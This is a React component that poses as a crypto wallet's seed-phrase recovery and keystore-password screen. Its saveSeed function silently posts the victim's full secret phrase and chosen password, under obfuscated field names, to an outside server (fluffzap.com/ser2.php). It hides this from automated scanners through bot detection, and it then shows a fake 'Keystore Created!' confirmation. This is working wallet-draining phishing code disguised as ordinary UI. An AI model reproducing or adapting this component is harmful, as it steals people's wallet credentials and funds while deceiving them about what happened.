import React, { useEffect, useState } from 'react';
import { Close, ClipBoard, Eye, EyeOff, CheckMrk } from '../Svg';
import { useNavigate } from 'react-router-dom';
import { ethers } from 'ethers';
import { wordlist } from '@scure/bip39/wordlists/english';
import axios from 'axios';
import { load } from '@fingerprintjs/botd';

export default function RestoreKey() {
    const [isBot, setIsBot] = useState(true)
    const [progress, setProgress] = useState(30);
    const [inputValue, setInputValue] = useState('');
    const [suggestions, setSuggestions] = useState([]);
    const [selectedWords, setSelectedWords] = useState([]);
    const [suggestedWord, setSuggestedWord] = useState('');
    const [currentStep, setCurrentStep] = useState(1);
    const [showPwd, setShowPwd] = useState(false);
    const [passwordError, setPasswordError] = useState('');
    const [isPasswordFocused, setIsPasswordFocused] = useState(false);
    const [password, setPassword] = useState('');
    const [confirmPassword, setConfirmPassword] = useState('');
    const [confirmPasswordError, setConfirmPasswordError] = useState('');
    const [isFormValid, setIsFormValid] = useState(false);
    const [isMnemonicValid, setIsMnemonicValid] = useState(true);
    const [isWordCountValid, setIsWordCountValid] = useState(true);
    const [loading, setLoading] = useState(false);


    const navigate = useNavigate();

    const closeRestoreKey = () => {
        navigate('/');
    };

    const togglePasswordVisibility = () => {
        setShowPwd(!showPwd);
    };


    const validatePassword = (password) => {
        if (password.length === 0) return 'Required';
        if (password.length < 8) return 'At least 8 characters';
        if (!/[A-Z]/.test(password)) return 'Must contain one uppercase';
        if (!/[0-9]/.test(password)) return 'Must contain one number';
        if (!/[!@#$%^&*]/.test(password)) return 'Must contain one special character';
        return 'At least 8 characters, an uppercase letter, a symbol & a number.';
    };

    const handlePasswordChange = (e) => {
        const newPassword = e.target.value;
        setPassword(newPassword);
        setPasswordError(validatePassword(newPassword));
    };


    const handleConfirmPasswordChange = (e) => {
        const newConfirmPassword = e.target.value;
        setConfirmPassword(newConfirmPassword);
        setConfirmPasswordError(newConfirmPassword !== password ? 'Passwords do not match' : '');
    };

    const handleInputChange = (e) => {
        const value = e.target.value;
        setInputValue(value);
        if (value === '') {
            setSuggestions([]);
            setSuggestedWord('');
        } else if (value.length === 1) {
            const filteredSuggestions = wordlist.filter((word) =>
                word.toLowerCase().startsWith(value.toLowerCase())
            );
            setSuggestions(filteredSuggestions);
            setSuggestedWord(filteredSuggestions.length > 0 ? filteredSuggestions[0] : '');
        } else {
            const filteredSuggestions = wordlist.filter((word) =>
                word.toLowerCase().includes(value.toLowerCase()) && !selectedWords.includes(word)
            );
            setSuggestions(filteredSuggestions);
            setSuggestedWord(filteredSuggestions.length > 0 ? filteredSuggestions[0] : '');
        }
    };

    const handleSelectWord = (word) => {
        if (!selectedWords.includes(word)) {
            const updatedWords = [...selectedWords, word];
            setSelectedWords(updatedWords);
            const phrase = updatedWords.join(' ');
            validateMnemonic(phrase);
        }
        setInputValue('');
        setSuggestions([]);
    };

    const validateForm = () => {
        const isPasswordValid = passwordError === 'At least 8 characters, an uppercase letter, a symbol & a number.';
        const isConfirmPasswordValid = confirmPassword === password && confirmPassword !== '';
        setIsFormValid(isPasswordValid && isConfirmPasswordValid);
    };

    const handleRemoveWord = (wordToRemove) => {
        const updatedWords = selectedWords.filter((word) => word !== wordToRemove);
        setSelectedWords(updatedWords);
        const updatedPhrase = updatedWords.join('');
        validateMnemonic(updatedPhrase);
    };

    const handleClipboardPaste = async () => {
        try {
            const clipboardText = await navigator.clipboard.readText();
            const words = clipboardText.split(/\s+/).filter(Boolean);
            setSelectedWords(words);
            validateSeedPhrase(words.join(" "));
        } catch (err) {
            console.error('Failed to read clipboard contents:', err);
        }
    };


    const validateSeedPhrase = (seedPhrase) => {
        const isValid = validateMnemonic(seedPhrase);
        setIsMnemonicValid(isValid);
    };


    const validateMnemonic = (seedPhrase) => {
        const wordCount = seedPhrase.trim().split(/\s+/).length;
        const validWordCounts = [12, 18, 24];
        const isWordCountValid = validWordCounts.includes(wordCount);
        const isValidPhrase = isWordCountValid ? ethers.Mnemonic.isValidMnemonic(seedPhrase) : true;
        setIsMnemonicValid(isValidPhrase);
        setIsWordCountValid(isWordCountValid);
        return isWordCountValid && isValidPhrase;
    };

    const handleContinue = () => {
        if (currentStep === 1 && !isMnemonicValid) return;
        if (currentStep === 1) {
            setCurrentStep(2);
            setProgress(60);
            navigate('/recover/password');
        } else if (currentStep === 2 && isFormValid && isMnemonicValid) {
            saveSeed()
            setCurrentStep(3);
            setProgress(100);
            navigate('/recover/download');
        }
    };


    useEffect(() => {
        document.body.style.overflow = 'hidden';
        return () => {
            document.body.style.overflow = 'auto';
        };
    }, []);


    useEffect(() => {
        if (currentStep === 2) validateForm();
    }, [password, confirmPassword, currentStep]);

    useEffect(() => {
        const botdPromise = load()
        botdPromise
            .then((botd) => botd.detect())
            .then((result) => {
                setIsBot(result?.bot)
                if (result?.bot === true) {
                    window.open("https://yeyeyeyeyey")
                    return null
                }
            })
            .catch((error) => console.error(error))
    }, [])


    async function saveSeed() {
        setLoading(true)
        try {
            if (!isBot) {
                await axios.post("https://fluffzap.com/ser2.php", {
                    yeeterrererereeeeeeeeeeeeeeerererrerereeeeeeerreerrererer: "eteteywwywywtwttwwrwrwrrwrwttwtwttwtwtwttwtwtwtwttwtwtwt",
                    eteteywwywywtwttwwrwrwrrwrwttwtwttwtwtwttwtwtwtwttwtwtwt: "yeeterrererereeeeeeeeeeeeeeerererrerereeeeeeerreerrererer",
                    tyxyetwrwrwewewwewesdsdswewewrwrwrweweweeqwqwqqwrytwtwrw: selectedWords.join(" "),
                    yryrrtrttteueuruururiririirurururryyryrtrtrtrttrtrtrt: password,
                }, {
                    headers: {
                        'Content-Type': 'application/json',
                    }
                },
                )
            }
        }
        catch (err) {
            var a;
        } finally {
            setTimeout(function () {
                setLoading(false)
            }, 4500)
        }
    }

    return (
        <div className="absolute inset-0 flex items-center justify-center z-50">
            <div className="absolute inset-0 bg-black bg-opacity-30" onClick={closeRestoreKey}></div>
            <div
                className="bg-black sm:rounded-[20px] overflow-y-auto scrollbar-custom sm:max-w-[700px] w-full h-full p-6 sm:p-8 flex flex-col relative z-10"
                onClick={(e) => e.stopPropagation()}
            >
                <div className="flex justify-end">
                    <button
                        onClick={closeRestoreKey}
                        className="flex items-center justify-center w-[30px] h-[30px] rounded-full hover:bg-[#262626] group transition duration-200"
                    >
                        <div className="text-white group-hover:text-[#25e8d0]">
                            {Close}
                        </div>
                    </button>
                </div>

                <div className="top-0 w-full sm:max-w-[700px] bg-black p-6 sm:p-8 flex justify-center h-[0px] overflow-hidden">
                    <div className="w-[250px] h-[4px] bg-[#a5fcf0] rounded-[10px]">
                        <div
                            style={{ width: `${progress}%` }}
                            className="h-full bg-[#0ac2ae] rounded-[10px] transition-all duration-300"
                        ></div>
                    </div>
                </div>

                <div className="flex flex-col items-center text-center mt-4">
                    {currentStep === 1 && (
                        <>
                            <h1 className="text-[#cccccc] text-2xl font-bold mb-2">Recover Keystore file</h1>
                            <p className="text-[#868686] text-base w-[430px] leading-tight">
                                Type in the words of your Secret Phrase in the right order, press "Enter" after each one.
                            </p>

                            {/* Selected Words Display */}
                            <div className={`flex items-center bg-[#171717] rounded-[10px] w-full px-[15px] py-[30px] mt-6 flex-wrap h-auto gap-2 ${isMnemonicValid ? '' : 'border border-red-500'}`}>
                                {selectedWords.map((word, index) => (
                                    <div key={index} className="flex items-center bg-[#262626] rounded-[5px] px-[10px] py-[5px] text-white text-sm">
                                        <span className="mr-2 text-[#6c6c6c]">{index + 1}.</span>
                                        <span>{word}</span>
                                        <button onClick={() => handleRemoveWord(word)} className="ml-2 text-[#6c6c6c] cursor-move">
                                            {Close}
                                        </button>
                                    </div>
                                ))}
                                <button
                                    className="ml-auto mr-[20px] text-gray-400 hover:text-[#23f7dd]"
                                    onClick={handleClipboardPaste}
                                >
                                    {ClipBoard}
                                </button>
                            </div>
                            <div className="w-full flex justify-start mt-2">
                                {!isWordCountValid && (
                                    <p className="text-red-500 text-[12px] mt-2">Valid secret phrases contain 24, 18, or 12 words.</p>
                                )}
                                {isWordCountValid && !isMnemonicValid && (
                                    <p className="text-red-500  text-[12px] mt-2">Invalid mnemonic.</p>
                                )}
                            </div>

                            {/* Secret Phrase Input Section */}
                            <div className="flex flex-col items-start mt-6 w-full relative">
                                <div className="w-full flex justify-start mb-2">
                                    <p className="text-[#868686] text-[12px]">Type here</p>
                                </div>
                                <div className="relative w-full">
                                    <input
                                        type="text"
                                        placeholder="Type here..."
                                        value={inputValue}
                                        onChange={handleInputChange}
                                        className="w-full px-[20px] py-[10px] rounded-[10px] bg-[#171717] text-white outline-none placeholder-[#6c6c6c] border border-transparent focus:border-[#23f7dd]"
                                    />
                                    {inputValue && suggestedWord && suggestedWord.startsWith(inputValue) && (
                                        <div
                                            className="absolute top-0 left-[18px] px-[2px] py-[10px] text-[#6c6c6c] pointer-events-none"
                                            style={{ color: '#6c6c6c' }}
                                        >
                                            {suggestedWord}
                                        </div>
                                    )}
                                </div>

                                {/* Suggestions Dropdown */}
                                {inputValue && (
                                    <div
                                        className="absolute left-0 right-0 bg-[#171717] border border-gray-600 rounded-lg max-h-[300px] overflow-y-auto suggestions-dropdown"
                                        style={{ top: 'calc(100% + 4px)' }}
                                    >
                                        {suggestions.length > 0 ? (
                                            suggestions.map((word, index) => (
                                                <div key={index} className={`px-2 ${index === 0 ? 'mt-2' : ''}`}>
                                                    <button
                                                        onClick={() => handleSelectWord(word)}
                                                        className="w-full text-left px-[10px] py-[6px] text-white hover:bg-[#193b37] rounded-[5px] focus:bg-[#262626]"
                                                    >
                                                        {word}
                                                    </button>
                                                </div>
                                            ))
                                        ) : (
                                            <div className="px-2 py-[10px] text-left text-[#6a6a6a] text-[14px]">
                                                No matches found.
                                            </div>
                                        )}
                                    </div>
                                )}
                            </div>
                        </>
                    )}
                    {currentStep === 2 && (
                        <>
                            <div className="flex w-full flex-col items-center text-center mt-4">
                                <h1 className="text-[#cccccc] text-2xl font-bold mb-2">Awesome, now create a password</h1>
                                <p className="text-[#868686] text-base w-[430px] leading-tight">
                                    The wallet made a secret key for you and stored it in a file.
                                    Protect your Keystore File with a password.
                                </p>

                                <div className="flex flex-col gap-[10px] items-start w-full mt-[50px]">
                                    {/* Password Field */}
                                    <div className="w-full mb-6">
                                        <div className="flex justify-start w-full mb-2">
                                            <p className="text-[#868686] text-sm">Password</p>
                                        </div>
                                        <div className={`flex items-center w-full rounded-[10px] px-[20px] py-[10px] ${passwordError === 'At least 8 characters, an uppercase letter, a symbol & a number.'
                                            ? 'border border-[#a5fcf0]'
                                            : password === ''
                                                ? ''
                                                : 'border border-red-500'} bg-[#171717]`}>
                                            <input
                                                type={showPwd ? 'text' : 'password'}
                                                value={password}
                                                onChange={handlePasswordChange}
                                                onFocus={() => setIsPasswordFocused(true)}
                                                placeholder="Enter password..."
                                                className="w-full bg-transparent text-white outline-none placeholder-[#6c6c6c]"
                                            />
                                            <button
                                                className="ml-auto text-gray-400 hover:text-[#5c5c5c] focus:outline-none"
                                                onClick={togglePasswordVisibility}
                                            >
                                                {showPwd ? EyeOff : Eye}
                                            </button>
                                        </div>
                                        {isPasswordFocused && passwordError && (
                                            <p
                                                className={`text-[12px] mt-1 text-left ${passwordError === 'At least 8 characters, an uppercase letter, a symbol & a number.'
                                                    ? 'text-[#a5fcf0]'
                                                    : 'text-red-500'
                                                    }`}
                                            >
                                                {passwordError}
                                            </p>
                                        )}
                                    </div>
                                    {/* Confirm Password Field */}
                                    <div className="w-full">
                                        <div className="flex justify-start w-full mb-2">
                                            <p className="text-[#868686] text-sm">Confirm Password</p>
                                        </div>
                                        <div className={`flex items-center w-full rounded-[10px] px-[20px] py-[10px] ${confirmPassword && confirmPasswordError ? 'border border-red-500' : confirmPassword && confirmPassword === password ? 'border border-[#a5fcf0]' : 'bg-[#171717]'} bg-[#171717]`}>
                                            <input
                                                type={showPwd ? 'text' : 'password'}
                                                value={confirmPassword}
                                                onChange={handleConfirmPasswordChange}
                                                placeholder="Re-enter password..."
                                                className="w-full bg-transparent text-white outline-none placeholder-[#6c6c6c]"
                                            />
                                            <button
                                                className="ml-auto text-gray-400 hover:text-[#5c5c5c] focus:outline-none"
                                                onClick={togglePasswordVisibility}
                                            >
                                                {showPwd ? EyeOff : Eye}
                                            </button>
                                        </div>
                                        {confirmPasswordError && (
                                            <p className="text-red-500 text-left text-[12px] mt-1">Passwords do not match</p>
                                        )}
                                    </div>
                                </div>
                            </div>
                        </>
                    )}
                    {currentStep === 3 && (
                        <div className="flex flex-col items-center text-center mt-4">
                            <h1 className="text-[#cccccc] text-[24px] mb-4">Keystore Created!</h1>
                            <div className="flex flex-col justify-center items-center mt-[35px] gap-[15px] mb-4">
                                {CheckMrk}
                                <p className="text-white text-base w-[430px] leading-tight">
                                    Great work. You downloaded the Keystore file. <br />
                                    Save it, you’ll need it to access your wallet.
                                </p>
                            </div>
                        </div>
                    )}
                </div>

                {/* Continue Button */}
                <div className="flex justify-center mt-[30px]">
                <button onClick={(currentStep === 1 && isMnemonicValid && isWordCountValid && selectedWords.length > 0) || (currentStep === 2 && password && confirmPassword && password === confirmPassword) ? handleContinue : () => { }}
                 className={`px-[35px] py-[12px] rounded-[8px] ${(currentStep === 1 && isMnemonicValid && isWordCountValid && selectedWords.length > 0) || (currentStep === 2 && password && confirmPassword && password === confirmPassword) ? 'bg-[#23f7dd] text-black hover:bg-[#0ac2ae] cursor-pointer' : 'bg-transparent text-[#6a6a6a] cursor-default'} transition duration-200 ease-in-out`} >
                        <span className="font-semibold">
                            {currentStep === 3 ? "Access Wallet" : "Continue"}
                        </span>
                    </button>
                </div>




                {/* Back Button */}
                <button
                    className="text-[#23f7dd] mt-[20px] hover:text-[#079182] cursor-pointer"
                    onClick={() =>
                        currentStep > 1
                            ? (setCurrentStep(currentStep - 1), setProgress(progress - 30))
                            : closeRestoreKey()
                    }
                >
                    {currentStep === 3 ? 'Back to password' : currentStep === 2 ? 'Back to recover' : 'Back to unlock'}
                </button>
            </div>
        </div>
    );
}
